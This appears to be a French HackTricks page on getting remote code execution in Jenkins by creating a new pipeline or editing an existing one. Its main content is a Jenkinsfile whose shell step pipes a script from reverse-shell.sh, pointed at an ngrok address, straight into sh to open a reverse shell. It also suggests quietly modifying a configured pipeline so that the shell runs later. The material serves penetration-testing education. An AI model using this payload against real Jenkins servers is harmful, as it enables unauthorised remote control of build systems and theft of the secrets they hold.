Jenkins RCE Creating/Modifying Pipeline

Apprenez le piratage AWS de zéro à héros avec htARTE (Expert Red Team AWS de HackTricks)!

Autres façons de soutenir HackTricks:

Création d'un nouveau Pipeline

Dans "Nouvel élément" (accessible dans /view/all/newJob), sélectionnez Pipeline:

Dans la section Pipeline, écrivez le reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Modification d'un Pipeline

Si vous pouvez accéder au fichier de configuration d'un pipeline configuré, vous pourriez simplement le modifier en ajoutant votre reverse shell puis l'exécuter ou attendre qu'il soit exécuté.

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks :

Dernière mise à jour